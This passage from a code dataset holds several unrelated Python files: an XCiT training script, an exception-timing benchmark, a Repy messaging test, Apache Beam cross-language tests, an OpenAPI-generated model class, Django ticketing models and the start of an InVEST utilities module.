training')\n parser.add_argument('--test-freq', default=1, type=int, help='Number of epochs between \\\n validation runs.')\n\n parser.add_argument('--full_crop', action='store_true', help='use crop_ratio=1.0 instead of the\\\n default 0.875 (Used by CaiT).')\n parser.add_argument(\"--pretrained\", default=None, type=str, help='Path to pre-trained checkpoint')\n parser.add_argument('--surgery', default=None, type=str, help='Path to checkpoint to copy the \\\n patch projection from. 
\\\n Can improve stability for very \\\n large models.')\n\n return parser\n\n\ndef main(args):\n utils.init_distributed_mode(args)\n\n print(args)\n\n device = torch.device(args.device)\n\n # fix the seed for reproducibility\n seed = args.seed + utils.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n cudnn.benchmark = True\n\n dataset_train, args.nb_classes = build_dataset(is_train=True, args=args)\n dataset_val, _ = build_dataset(is_train=False, args=args)\n\n if True: # args.distributed:\n num_tasks = utils.get_world_size()\n global_rank = utils.get_rank()\n if args.repeated_aug:\n sampler_train = RASampler(\n dataset_train, num_replicas=num_tasks, rank=global_rank, shuffle=True\n )\n else:\n sampler_train = torch.utils.data.DistributedSampler(\n dataset_train, num_replicas=num_tasks, rank=global_rank, shuffle=True\n )\n if args.dist_eval:\n if len(dataset_val) % num_tasks != 0:\n print('Warning: Enabling distributed evaluation with an eval dataset not divisible by process number. '\n 'This will slightly alter validation results as extra duplicate entries are added to achieve '\n 'equal num of samples per-process.')\n sampler_val = torch.utils.data.DistributedSampler(\n dataset_val, num_replicas=num_tasks, rank=global_rank, shuffle=False)\n else:\n sampler_val = torch.utils.data.SequentialSampler(dataset_val)\n else:\n sampler_train = torch.utils.data.RandomSampler(dataset_train)\n sampler_val = torch.utils.data.SequentialSampler(dataset_val)\n\n data_loader_train = torch.utils.data.DataLoader(\n dataset_train, sampler=sampler_train,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=args.pin_mem,\n drop_last=True,\n )\n\n data_loader_val = torch.utils.data.DataLoader(\n dataset_val, sampler=sampler_val,\n batch_size=int(1.5 * args.batch_size),\n num_workers=args.num_workers,\n pin_memory=args.pin_mem,\n drop_last=False\n )\n\n mixup_fn = None\n mixup_active = args.mixup > 0 or args.cutmix > 0. 
or args.cutmix_minmax is not None\n if mixup_active:\n mixup_fn = Mixup(\n mixup_alpha=args.mixup, cutmix_alpha=args.cutmix, cutmix_minmax=args.cutmix_minmax,\n prob=args.mixup_prob, switch_prob=args.mixup_switch_prob, mode=args.mixup_mode,\n label_smoothing=args.smoothing, num_classes=args.nb_classes)\n\n print(f\"Creating model: {args.model}\")\n\n model = create_model(\n args.model,\n pretrained=False,\n num_classes=args.nb_classes,\n drop_rate=args.drop,\n drop_path_rate=args.drop_path,\n drop_block_rate=None\n )\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n\n if args.pretrained:\n if args.pretrained.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n args.pretrained, map_location='cpu', check_hash=True)\n else:\n checkpoint = torch.load(args.pretrained, map_location='cpu')\n\n checkpoint_model = checkpoint['model']\n state_dict = model.state_dict()\n for k in ['head.weight', 'head.bias']:\n if k in checkpoint_model and checkpoint_model[k].shape != state_dict[k].shape:\n print(f\"Removing key {k} from pretrained checkpoint\")\n del checkpoint_model[k]\n\n model.load_state_dict(checkpoint_model, strict=True)\n\n model.to(device)\n\n if args.surgery:\n checkpoint = torch.load(args.surgery, map_location='cpu')\n checkpoint_model = checkpoint['model']\n patch_embed_weights = {key.replace(\"patch_embed.\", \"\"): value for key,\n value in checkpoint['model'].items() if 'patch_embed' in key}\n\n model.patch_embed.load_state_dict(patch_embed_weights)\n for p in model.patch_embed.parameters():\n p.requires_grad = False\n\n model_ema = None\n if args.model_ema:\n # Important to create EMA model after cuda(), DP wrapper, and AMP but before SyncBN and DDP wrapper\n model_ema = ModelEma(\n model,\n decay=args.model_ema_decay,\n device='cpu' if args.model_ema_force_cpu else '',\n resume='')\n\n model_without_ddp = model\n if args.distributed:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])\n model_without_ddp = model.module\n n_parameters = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print('number of params:', n_parameters)\n\n linear_scaled_lr = args.lr * args.batch_size * utils.get_world_size() / 512.0\n args.lr = linear_scaled_lr\n optimizer = create_optimizer(args, model_without_ddp)\n loss_scaler = NativeScaler()\n\n lr_scheduler, _ = create_scheduler(args, optimizer)\n\n criterion = LabelSmoothingCrossEntropy()\n\n if args.mixup > 0.:\n # smoothing is handled with mixup label transform\n criterion = SoftTargetCrossEntropy()\n elif args.smoothing:\n criterion = LabelSmoothingCrossEntropy(smoothing=args.smoothing)\n else:\n criterion = torch.nn.CrossEntropyLoss()\n\n teacher_model = None\n if args.distillation_type != 'none':\n assert args.teacher_path, 'need to specify teacher-path when using distillation'\n print(f\"Creating teacher model: {args.teacher_model}\")\n teacher_model = create_model(\n args.teacher_model,\n pretrained=False,\n num_classes=args.nb_classes,\n global_pool='avg',\n )\n if args.teacher_path.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n args.teacher_path, map_location='cpu', check_hash=True)\n else:\n checkpoint = torch.load(args.teacher_path, map_location='cpu')\n\n teacher_model.load_state_dict(checkpoint['model'])\n\n teacher_model.to(device)\n teacher_model.eval()\n\n # wrap the criterion in our custom DistillationLoss, which\n # just dispatches to the original criterion if args.distillation_type is 'none'\n criterion = DistillationLoss(\n 
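# --- Hedged sketch of the linear learning-rate scaling used above ---
# The base LR (default 5e-4) is multiplied by the global batch size
# (per-GPU batch size * world size) relative to a reference batch of 512.
# The example numbers below are assumptions chosen only to show the
# arithmetic, not recommended settings.
def scale_lr_demo(base_lr: float, batch_per_gpu: int, world_size: int, ref_batch: float = 512.0) -> float:
    return base_lr * batch_per_gpu * world_size / ref_batch


# 64 images/GPU on 8 GPUs  -> global batch 512  -> LR stays at 5e-4
assert abs(scale_lr_demo(5e-4, 64, 8) - 5e-4) < 1e-12
# 128 images/GPU on 8 GPUs -> global batch 1024 -> LR doubles to 1e-3
assert abs(scale_lr_demo(5e-4, 128, 8) - 1e-3) < 1e-12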
criterion, teacher_model, args.distillation_type, args.distillation_alpha, args.distillation_tau\n )\n\n output_dir = Path(args.output_dir)\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n resume_path = os.path.join(output_dir, 'checkpoint.pth')\n if args.resume and os.path.exists(resume_path):\n if args.resume.startswith('https'):\n checkpoint = torch.hub.load_state_dict_from_url(\n args.resume, map_location='cpu', check_hash=True)\n else:\n print(\"Loading from checkpoint ...\")\n checkpoint = torch.load(resume_path, map_location='cpu')\n model_without_ddp.load_state_dict(checkpoint['model'])\n if not args.eval and 'optimizer' in checkpoint and 'lr_scheduler' in checkpoint and 'epoch' in checkpoint:\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n args.start_epoch = checkpoint['epoch'] + 1\n if args.model_ema:\n utils._load_checkpoint_for_ema(model_ema, checkpoint['model_ema'])\n if 'scaler' in checkpoint:\n loss_scaler.load_state_dict(checkpoint['scaler'])\n\n if args.eval:\n test_stats = evaluate(data_loader_val, model, device)\n print(f\"Accuracy of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%\")\n return\n\n print(f\"Start training for {args.epochs} epochs\")\n start_time = time.time()\n max_accuracy = 0.0\n for epoch in range(args.start_epoch, args.epochs):\n if args.distributed:\n data_loader_train.sampler.set_epoch(epoch)\n\n train_stats = train_one_epoch(\n model, criterion, data_loader_train,\n optimizer, device, epoch, loss_scaler,\n args.clip_grad, model_ema, mixup_fn,\n surgery=args.surgery\n )\n\n lr_scheduler.step(epoch)\n if args.output_dir:\n checkpoint_paths = [output_dir / 'checkpoint.pth']\n for checkpoint_path in checkpoint_paths:\n utils.save_on_master({\n 'model': model_without_ddp.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch,\n 'model_ema': get_state_dict(model_ema),\n 'scaler': loss_scaler.state_dict(),\n 'args': args,\n }, checkpoint_path)\n\n if (epoch % args.test_freq == 0) or (epoch == args.epochs - 1):\n test_stats = evaluate(data_loader_val, model, device)\n\n if test_stats[\"acc1\"] >= max_accuracy:\n utils.save_on_master({\n 'model': model_without_ddp.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch,\n 'model_ema': get_state_dict(model_ema),\n 'args': args,\n }, os.path.join(output_dir, 'best_model.pth'))\n\n print(f\"Accuracy of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%\")\n max_accuracy = max(max_accuracy, test_stats[\"acc1\"])\n print(f'Max accuracy: {max_accuracy:.2f}%')\n\n log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},\n **{f'test_{k}': v for k, v in test_stats.items()},\n 'epoch': epoch,\n 'n_parameters': n_parameters}\n\n if args.output_dir and utils.is_main_process():\n with (output_dir / \"log.txt\").open(\"a\") as f:\n f.write(json.dumps(log_stats) + \"\\n\")\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('XCiT training and evaluation script', parents=[get_args_parser()])\n args = parser.parse_args()\n if args.output_dir:\n Path(args.output_dir).mkdir(parents=True, exist_ok=True)\n main(args)\n"} {"ext": "py", "sha": "1a2eed3a1d54dddbdefb034dee20a0c99e513fe1", "content": 
"###################################\n# File Name : exception_performance.py\n###################################\n#!/usr/bin/python3\n\nimport os\nimport time\n\nTRY_TEST_FILE=\"performance_try_file\"\nTRY_ELSE_TEST_FILE=\"performance_try_else_file\"\n\ndef write_file_only_try():\n try:\n f = open(TRY_TEST_FILE, \"w\")\n\n for i in range(10000000):\n f.write(str(i))\n\n f.close()\n except:\n print (\"File open error\")\n finally:\n os.remove(TRY_TEST_FILE)\n\ndef write_file_try_else():\n try:\n f = open(TRY_ELSE_TEST_FILE, \"w\")\n except:\n print (\"File open error\")\n else:\n for i in range(10000000):\n f.write(str(i))\n\n f.close()\n finally:\n os.remove(TRY_ELSE_TEST_FILE)\n\ndef check_runtime(func):\n accumulate_time = 0\n for i in range(10):\n start = time.time()\n func()\n accumulate_time += (time.time() - start)\n print (\"Run time summary : %s\" % str(accumulate_time / 10))\n\n\nif __name__ == \"__main__\":\n print (\"=== Try Performance Test ===\")\n check_runtime(write_file_only_try)\n\n print (\"=== Try/Else Performance Test ===\")\n check_runtime(write_file_try_else)\n"} {"ext": "py", "sha": "1a2eed613faa08496c8905dc43f153e18b0df979", "content": "#pragma out\n#pragma repy\n\ndef foo(ip,port,mess, ch):\n print ip,port,mess,ch\n stopcomm(ch)\n\nif callfunc == 'initialize':\n ip = getmyip()\n recvmess(ip,,foo)\n sleep(.1)\n sendmess(ip,,'hi')\n"} {"ext": "py", "sha": "1a2eee7c782323d32fa6afe322d8b0b4f6a6c96d", "content": "#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\n###########################################################\nRunner Validation Test Suite for Cross-language Transforms\n###########################################################\n As per Beams's Portability Framework design, Cross-language transforms\n should work out of the box. In spite of this, there always exists a\n possibility of rough edges existing. 
It could be caused due to unpolished\n implementation of any part of the execution code path, for example:\n - Transform expansion [SDK]\n - Pipeline construction [SDK]\n - Cross-language artifact staging [Runner]\n - Language specific serialization/deserialization of PCollection (and\n other data types) [Runner/SDK]\n\n In an effort to improve developer visibility into potential problems,\n this test suite validates correct execution of 5 Core Beam transforms when\n used as cross-language transforms within the Python SDK from any foreign SDK:\n - ParDo\n (https://beam.apache.org/documentation/programming-guide/#pardo)\n - GroupByKey\n (https://beam.apache.org/documentation/programming-guide/#groupbykey)\n - CoGroupByKey\n (https://beam.apache.org/documentation/programming-guide/#cogroupbykey)\n - Combine\n (https://beam.apache.org/documentation/programming-guide/#combine)\n - Flatten\n (https://beam.apache.org/documentation/programming-guide/#flatten)\n - Partition\n (https://beam.apache.org/documentation/programming-guide/#partition)\n\n See Runner Validation Test Plan for Cross-language transforms at\nhttps://docs.google.com/document/d/1xQp0ElIV84b8OCVz8CD2hvbiWdR8w4BvWxPTZJZA6NA\n for further details.\n\"\"\"\n\nimport logging\nimport os\nimport typing\nimport unittest\n\nfrom nose.plugins.attrib import attr\n\nimport apache_beam as beam\nfrom apache_beam.testing.test_pipeline import TestPipeline\nfrom apache_beam.testing.util import assert_that\nfrom apache_beam.testing.util import equal_to\nfrom apache_beam.transforms.external import ImplicitSchemaPayloadBuilder\n\nTEST_PREFIX_URN = \"beam:transforms:xlang:test:prefix\"\nTEST_MULTI_URN = \"beam:transforms:xlang:test:multi\"\nTEST_GBK_URN = \"beam:transforms:xlang:test:gbk\"\nTEST_CGBK_URN = \"beam:transforms:xlang:test:cgbk\"\nTEST_COMGL_URN = \"beam:transforms:xlang:test:comgl\"\nTEST_COMPK_URN = \"beam:transforms:xlang:test:compk\"\nTEST_FLATTEN_URN = \"beam:transforms:xlang:test:flatten\"\nTEST_PARTITION_URN = \"beam:transforms:xlang:test:partition\"\n\n\nclass CrossLanguageTestPipelines(object):\n def __init__(self, expansion_service=None):\n self.expansion_service = expansion_service or (\n 'localhost:%s' % os.environ.get('EXPANSION_PORT'))\n\n def run_prefix(self, pipeline):\n \"\"\"\n Target transform - ParDo\n (https://beam.apache.org/documentation/programming-guide/#pardo)\n Test scenario - Mapping elements from a single input collection to a\n single output collection\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create(['a', 'b']).with_output_types(str)\n | beam.ExternalTransform(\n TEST_PREFIX_URN,\n ImplicitSchemaPayloadBuilder({'data': u'0'}),\n self.expansion_service))\n assert_that(res, equal_to(['0a', '0b']))\n\n def run_multi_input_output_with_sideinput(self, pipeline):\n \"\"\"\n Target transform - ParDo\n (https://beam.apache.org/documentation/programming-guide/#pardo)\n Test scenario - Mapping elements from multiple input collections (main\n and side) to multiple output collections (main and side)\n Boundary conditions checked -\n - PCollectionTuple to external transforms\n - PCollectionTuple from external transforms\n \"\"\"\n with pipeline as p:\n main1 = p | 'Main1' >> beam.Create(\n ['a', 'bb'], reshuffle=False).with_output_types(str)\n main2 = p | 'Main2' >> beam.Create(\n ['x', 'yy', 'zzz'], reshuffle=False).with_output_types(str)\n side = p | 'Side' >> 
beam.Create(['s']).with_output_types(str)\n res = dict(\n main1=main1, main2=main2, side=side) | beam.ExternalTransform(\n TEST_MULTI_URN, None, self.expansion_service)\n assert_that(res['main'], equal_to(['as', 'bbs', 'xs', 'yys', 'zzzs']))\n assert_that(res['side'], equal_to(['ss']), label='CheckSide')\n\n def run_group_by_key(self, pipeline):\n \"\"\"\n Target transform - GroupByKey\n (https://beam.apache.org/documentation/programming-guide/#groupbykey)\n Test scenario - Grouping a collection of KV to a collection of\n KV> by key\n Boundary conditions checked -\n - PCollection> to external transforms\n - PCollection>> from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([(0, \"1\"), (0, \"2\"),\n (1, \"3\")], reshuffle=False).with_output_types(\n typing.Tuple[int, str])\n | beam.ExternalTransform(TEST_GBK_URN, None, self.expansion_service)\n | beam.Map(lambda x: \"{}:{}\".format(x[0], ','.join(sorted(x[1])))))\n assert_that(res, equal_to(['0:1,2', '1:3']))\n\n def run_cogroup_by_key(self, pipeline):\n \"\"\"\n Target transform - CoGroupByKey\n (https://beam.apache.org/documentation/programming-guide/#cogroupbykey)\n Test scenario - Grouping multiple input collections with keys to a\n collection of KV by key\n Boundary conditions checked -\n - KeyedPCollectionTuple to external transforms\n - PCollection>> from external transforms\n \"\"\"\n with pipeline as p:\n col1 = p | 'create_col1' >> beam.Create(\n [(0, \"1\"), (0, \"2\"), (1, \"3\")], reshuffle=False).with_output_types(\n typing.Tuple[int, str])\n col2 = p | 'create_col2' >> beam.Create(\n [(0, \"4\"), (1, \"5\"), (1, \"6\")], reshuffle=False).with_output_types(\n typing.Tuple[int, str])\n res = (\n dict(col1=col1, col2=col2)\n | beam.ExternalTransform(TEST_CGBK_URN, None, self.expansion_service)\n | beam.Map(lambda x: \"{}:{}\".format(x[0], ','.join(sorted(x[1])))))\n assert_that(res, equal_to(['0:1,2,4', '1:3,5,6']))\n\n def run_combine_globally(self, pipeline):\n \"\"\"\n Target transform - Combine\n (https://beam.apache.org/documentation/programming-guide/#combine)\n Test scenario - Combining elements globally with a predefined simple\n CombineFn\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([1, 2, 3]).with_output_types(int)\n | beam.ExternalTransform(\n TEST_COMGL_URN, None, self.expansion_service))\n assert_that(res, equal_to([6]))\n\n def run_combine_per_key(self, pipeline):\n \"\"\"\n Target transform - Combine\n (https://beam.apache.org/documentation/programming-guide/#combine)\n Test scenario - Combining elements per key with a predefined simple\n merging function\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([('a', 1), ('a', 2),\n ('b', 3)]).with_output_types(typing.Tuple[str, int])\n | beam.ExternalTransform(\n TEST_COMPK_URN, None, self.expansion_service))\n assert_that(res, equal_to([('a', 3), ('b', 3)]))\n\n def run_flatten(self, pipeline):\n \"\"\"\n Target transform - Flatten\n (https://beam.apache.org/documentation/programming-guide/#flatten)\n Test scenario - Merging multiple collections into a single collection\n Boundary conditions checked -\n - PCollectionList to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n col1 = p | 'col1' >> beam.Create([1, 2, 3]).with_output_types(int)\n col2 
= p | 'col2' >> beam.Create([4, 5, 6]).with_output_types(int)\n res = ((col1, col2)\n | beam.ExternalTransform(\n TEST_FLATTEN_URN, None, self.expansion_service))\n assert_that(res, equal_to([1, 2, 3, 4, 5, 6]))\n\n def run_partition(self, pipeline):\n \"\"\"\n Target transform - Partition\n (https://beam.apache.org/documentation/programming-guide/#partition)\n Test scenario - Splitting a single collection into multiple collections\n with a predefined simple PartitionFn\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollectionList from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([1, 2, 3, 4, 5, 6]).with_output_types(int)\n | beam.ExternalTransform(\n TEST_PARTITION_URN, None, self.expansion_service))\n assert_that(res['0'], equal_to([2, 4, 6]), label='check_even')\n assert_that(res['1'], equal_to([1, 3, 5]), label='check_odd')\n\n\n@attr('UsesCrossLanguageTransforms')\n@unittest.skipUnless(\n os.environ.get('EXPANSION_PORT'),\n \"EXPANSION_PORT environment var is not provided.\")\nclass ValidateRunnerXlangTest(unittest.TestCase):\n _multiprocess_can_split_ = True\n\n def create_pipeline(self):\n test_pipeline = TestPipeline()\n test_pipeline.not_use_test_runner_api = True\n return test_pipeline\n\n def test_prefix(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_prefix(\n test_pipeline or self.create_pipeline())\n\n def test_multi_input_output_with_sideinput(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_multi_input_output_with_sideinput(\n test_pipeline or self.create_pipeline())\n\n def test_group_by_key(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_group_by_key(\n test_pipeline or self.create_pipeline())\n\n def test_cogroup_by_key(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_cogroup_by_key(\n test_pipeline or self.create_pipeline())\n\n def test_combine_globally(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_combine_globally(\n test_pipeline or self.create_pipeline())\n\n def test_combine_per_key(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_combine_per_key(\n test_pipeline or self.create_pipeline())\n\n def test_flatten(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_flatten(\n test_pipeline or self.create_pipeline())\n\n def test_partition(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_partition(\n test_pipeline or self.create_pipeline())\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n unittest.main()\n"} {"ext": "py", "sha": "1a2eee8b4ab428996b7aa50d407ec5841bed9992", "content": "# coding: utf-8\n\n\"\"\"\n EPIC API\n\n REST API for interacting with EPIC (https://epic.zenotech.com) services.
    Please note this API is in BETA and does not yet contain all EPIC functionality. # noqa: E501\n\n The version of the OpenAPI document: v2\n Contact: support@zenotech.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom epiccore.configuration import Configuration\n\n\nclass TeamDetails(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'id': 'int',\n 'name': 'str',\n 'number_of_members': 'int',\n 'user_role': 'str',\n 'members': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'name': 'name',\n 'number_of_members': 'number_of_members',\n 'user_role': 'user_role',\n 'members': 'members'\n }\n\n def __init__(self, id=None, name=None, number_of_members=None, user_role=None, members=None, local_vars_configuration=None): # noqa: E501\n \"\"\"TeamDetails - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._id = None\n self._name = None\n self._number_of_members = None\n self._user_role = None\n self._members = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if name is not None:\n self.name = name\n if number_of_members is not None:\n self.number_of_members = number_of_members\n if user_role is not None:\n self.user_role = user_role\n if members is not None:\n self.members = members\n\n @property\n def id(self):\n \"\"\"Gets the id of this TeamDetails. # noqa: E501\n\n ID for this team # noqa: E501\n\n :return: The id of this TeamDetails. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this TeamDetails.\n\n ID for this team # noqa: E501\n\n :param id: The id of this TeamDetails. # noqa: E501\n :type id: int\n \"\"\"\n\n self._id = id\n\n @property\n def name(self):\n \"\"\"Gets the name of this TeamDetails. # noqa: E501\n\n Name of this team # noqa: E501\n\n :return: The name of this TeamDetails. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this TeamDetails.\n\n Name of this team # noqa: E501\n\n :param name: The name of this TeamDetails. # noqa: E501\n :type name: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n name is not None and len(name) < 1):\n raise ValueError(\"Invalid value for `name`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._name = name\n\n @property\n def number_of_members(self):\n \"\"\"Gets the number_of_members of this TeamDetails. # noqa: E501\n\n Number of members in this team # noqa: E501\n\n :return: The number_of_members of this TeamDetails. # noqa: E501\n :rtype: int\n \"\"\"\n return self._number_of_members\n\n @number_of_members.setter\n def number_of_members(self, number_of_members):\n \"\"\"Sets the number_of_members of this TeamDetails.\n\n Number of members in this team # noqa: E501\n\n :param number_of_members: The number_of_members of this TeamDetails. 
# noqa: E501\n :type number_of_members: int\n \"\"\"\n\n self._number_of_members = number_of_members\n\n @property\n def user_role(self):\n \"\"\"Gets the user_role of this TeamDetails. # noqa: E501\n\n Your role in this team # noqa: E501\n\n :return: The user_role of this TeamDetails. # noqa: E501\n :rtype: str\n \"\"\"\n return self._user_role\n\n @user_role.setter\n def user_role(self, user_role):\n \"\"\"Sets the user_role of this TeamDetails.\n\n Your role in this team # noqa: E501\n\n :param user_role: The user_role of this TeamDetails. # noqa: E501\n :type user_role: str\n \"\"\"\n\n self._user_role = user_role\n\n @property\n def members(self):\n \"\"\"Gets the members of this TeamDetails. # noqa: E501\n\n List of user ids and roles for members of this team # noqa: E501\n\n :return: The members of this TeamDetails. # noqa: E501\n :rtype: str\n \"\"\"\n return self._members\n\n @members.setter\n def members(self, members):\n \"\"\"Sets the members of this TeamDetails.\n\n List of user ids and roles for members of this team # noqa: E501\n\n :param members: The members of this TeamDetails. # noqa: E501\n :type members: str\n \"\"\"\n\n self._members = members\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, TeamDetails):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, TeamDetails):\n return True\n\n return self.to_dict() != other.to_dict()\n"} {"ext": "py", "sha": "1a2ef19fe5cde47f873d292aee2cd6eb153fe33c", "content": "from django.db import models\r\nfrom datetime import datetime\r\n\r\nclass Activity(models.Model):\r\n activity_id = models.AutoField(primary_key = True)\r\n title = models.CharField(max_length = 30)\r\n image = models.ImageField(upload_to = 'images', default = 'default/test_image.jpg')\r\n status = models.CharField(max_length = 20, default = '正在抢票')\r\n remain = models.IntegerField(default = 100)\r\n publisher = models.CharField(max_length = 30, default = 'unknown publisher')\r\n description = models.CharField(max_length = 1024, default = '哎呀,这个活动的介绍文字似乎走丢了...')\r\n time = models.DateTimeField(default = datetime.now)\r\n place = models.CharField(max_length = 30, default = 'none place')\r\n price = models.FloatField(default = 0.0)\r\n\r\n heat = models.FloatField(default = 50.0) # 活动热度\r\n scan_change = models.FloatField(default = 0.02) # 浏览时增加的热度\r\n star_change = models.FloatField(default = 0.5) # 关注/取关时的热度变化\r\n purchase_change = models.FloatField(default = 2.0) # 购买/退票时的热度变化\r\n # arrive_change = models.FloatField(default = 2.5) # 到场时的热度变化\r\n # max_heat = models.FloatField(default = 1000)\r\n 
min_heat = models.FloatField(default = 0) # 活动过期后置为最低热度\r\n\r\n # 该活动有以下检票员\r\n # inspectors = models.ManyToManyField(User)\r\n \r\n class Meta:\r\n db_table = 'Activity'\r\n\r\nclass User(models.Model):\r\n # basic info\r\n user_id = models.AutoField(primary_key = True)\r\n openid = models.CharField(max_length = 30)\r\n username = models.CharField(max_length = 30)\r\n password = models.CharField(max_length = 30)\r\n student_id = models.CharField(max_length = 10, default=0, blank=True, null=True)\r\n # ManyToManyField中没有null,设置blank以实现可在admin中置空\r\n # 关联一个外键多次时,需使用related_name\r\n starred = models.ManyToManyField(Activity, related_name='starred', blank=True)\r\n # 该用户向以下活动提出了待处理的检票员申请\r\n inspector_apply_list = models.ManyToManyField(Activity, related_name='inspector_apply_list', blank=True)\r\n # 该用户是以下活动的检票员\r\n inspector_list = models.ManyToManyField(Activity, related_name='inspector_list', blank=True)\r\n\r\n # varify info\r\n is_verified = models.BooleanField(default=False) # 学号登录验证接口\r\n\r\n class Meta:\r\n db_table = 'User'\r\n\r\nclass Ticket(models.Model):\r\n ticket_id = models.AutoField(primary_key = True)\r\n owner = models.ForeignKey(User, on_delete=models.DO_NOTHING, default = '')\r\n activity = models.ForeignKey(Activity, on_delete=models.DO_NOTHING, default = '')\r\n is_valid = models.BooleanField(default=False) # 仅表示是否退票\r\n purchaseTime = models.DateTimeField('购票日期', auto_now_add = True) # PS:auto_now_add使之为readonly。若需修改puchaseTime,则此处应改用default = timezone.now\r\n # WARMNING:修改含auto_now或auto_now_add的字段时,需先改为default = 'xxxx-xx-xx xx:xx:xx'并完成一次迁移\r\n QRCode = models.ImageField(upload_to = 'QR', default = 'QR/default.png')\r\n is_checked = models.BooleanField(default=False)\r\n\r\n class Meta:\r\n db_table = 'Ticket'\r\n"} {"ext": "py", "sha": "1a2ef246f1d7ab7917028ee9191f2a5562970364", "content": "\"\"\"InVEST specific code utils.\"\"\"\nimport codecs\nimport math\nimport os\nimport contextlib\nimport logging\nimport tempfile\nimport shutil\nfrom datetime import datetime\nimport time\n\nimport pandas\nimport numpy\nfrom shapely.wkt import loads\nfrom osgeo import gdal\nfrom osgeo import osr\nimport pygeoprocessing\n\n\nLOGGER = logging.getLogger(__name__)\nLOG_FMT = (\n \"%(asctime)s \"\n \"(%(name)s) \"\n \"%(module)s.%(funcName)s(%(lineno)d) \"\n \"%(levelname)s %(message)s\")\n\n# GDAL has 5 error levels, python's logging has 6. We skip logging.INFO.\n# A dict clarifies the mapping between levels.\nGDAL_ERROR_LEVELS = {\n gdal.CE_None: logging.NOTSET,\n gdal.CE_Debug: logging.DEBUG,\n gdal.CE_Warning: logging.WARNING,\n gdal.CE_Failure: logging.ERROR,\n gdal.CE_Fatal: logging.CRITICAL,\n}\n\n# In 